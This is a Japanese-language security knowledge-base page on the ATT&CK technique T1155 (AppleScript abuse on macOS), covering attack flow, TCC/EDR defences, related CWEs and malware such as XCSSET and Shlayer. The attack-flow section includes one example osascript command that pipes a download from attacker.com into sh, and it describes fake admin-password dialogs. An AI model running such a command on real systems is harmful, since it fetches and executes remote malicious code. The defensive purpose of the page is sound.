Technique - T1155-

T1155 - AppleScript

概要

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".

管理者によるコメント

T1155「AppleScript」 は、macOSにおいてアプリケーション間の通信や自動化を行うためのスクリプト言語 AppleScript を悪用して、コードを実行する手法です。

1. 概要

この手法で攻撃者は、「macOSの正規の自動化機能を悪用した、ユーザーに気づかれにくい操作」を実現します。

何を実現できるのか

コード実行: 攻撃者が用意したコマンドやプログラムを実行させます。
情報の窃取: ブラウザの履歴、連絡先、メール、さらにはキー入力の内容や画面のスクリーンショットをキャプチャします。
検知の回避: AppleScriptはmacOSのシステムと密接に連携しているため、正規のシステム管理作業やユーザーの操作として扱われ、不審な挙動として検知されにくい性質があります。
管理者権限の取得: 偽のパスワード入力プロンプトを表示させ、ユーザーから管理者パスワードを騙し取る（フィッシング）のにも使われます。

2. 攻撃の流れ

AppleScriptは、スクリプトエディタで作成されたファイルのほか、コマンドラインツールの osascript を通じて実行されます。

侵入と呼び出し:
- フィッシングメールに添付されたマクロ付き文書や、不正なインストーラーからAppleScriptを呼び出します。
- 例: osascript -e 'do shell script "curl [http://attacker.com/malware](http://attacker.com/malware) | sh"'
OSAScriptの悪用:
- osascript コマンドを使用すると、バックグラウンドでスクリプトを走らせることができるため、攻撃者はファイルを作らずに（ファイルレスで）メモリ上で直接命令を実行します。
権限昇格の試行:
- with administrator privileges というコマンドを使い、ユーザーに「システムの設定を変更するためにパスワードが必要です」といった正規のシステムメッセージに似た偽画面を出します。
他アプリの操作:
- AppleScriptの最大の特徴である「他のアプリを操作する能力」を使い、Keychain（パスワード管理）から情報を引き出したり、ブラウザからクッキーを盗んだりします。

3. 防御・対策

macOSのプライバシー制限機能（TCC）を正しく理解し、監視することが重要です。

TCC (Transparency, Consent, and Control) の活用: macOSのセキュリティ設定で、「アクセシビリティ」や「フルディスクアクセス」を許可するアプリを最小限にします。AppleScriptが他のアプリに干渉しようとするとOSが警告を出しますが、ユーザーがそれを安易に許可しないよう教育が必要です。
osascript の実行ログ監視: エンドポイント監視ツール（EDR）を用いて、osascript が実行された際の引数や、ネットワーク通信を伴う動作をしていないかを記録・監視します。
不審な親子プロセスの検知: ブラウザやメールソフトから osascript が起動されるといった、通常ではあり得ないプロセスツリーの発生を検知します。
管理者権限プロンプトの警戒: 突然表示されるパスワード要求に対し、どのアプリがそれを要求しているのかを確認するよう徹底します。

4. 重要ポイント

「言語の壁」: AppleScriptは英語に近い構文（AppleScript English）を持つため、コードの内容が比較的読みやすいですが、その分、正規のスクリプトとの判別が難しい難読化手法も存在します。
macOS特有のLotL: WindowsにおけるPowerShell（T1059.001）と同じく、macOSにおける「自給自足型（Living off the Land）」攻撃の主要な手段です。

5. 関連する主なCWE

CWE-74: Improper Neutralization of Special Elements (Injection): アプリケーションが外部からの入力を不適切にAppleScriptとして実行してしまう問題。
CWE-451: UI Misrepresentation: ユーザーに対して正規のシステムメッセージを装った偽の入力を促す不備。

6. 関連する代表的な事例

XCSSET: macOSをターゲットにしたマルウェア。開発環境（Xcode）を介して感染を広げ、AppleScriptを多用してブラウザからデータを盗んだり、権限を奪取したりしました。
Shlayer: macOSで最も一般的なアドウェア・トロイの木馬の一つ。AppleScriptを使用してシステム設定を変更し、追加の悪意のあるソフトをダウンロードさせます。
MacDownloader: 特定の組織を狙った攻撃で使用され、AppleScriptを用いてシステム情報を収集し、C2サーバーへ送信していました。

実務上のアドバイス

最近のmacOSでは、AppleScriptが他のアプリを制御しようとすると、ユーザーに明確な許可を求めるダイアログが表示されます。このダイアログが「なぜ今出たのか」を分析することが、インシデント初動における重要なチェックポイントとなります。

分析

この攻撃手法を利用する脅威アクター

攻撃手法 – 脅威アクター Graph

← Technique一覧に戻る ← Tactics一覧に戻る

Trusted Design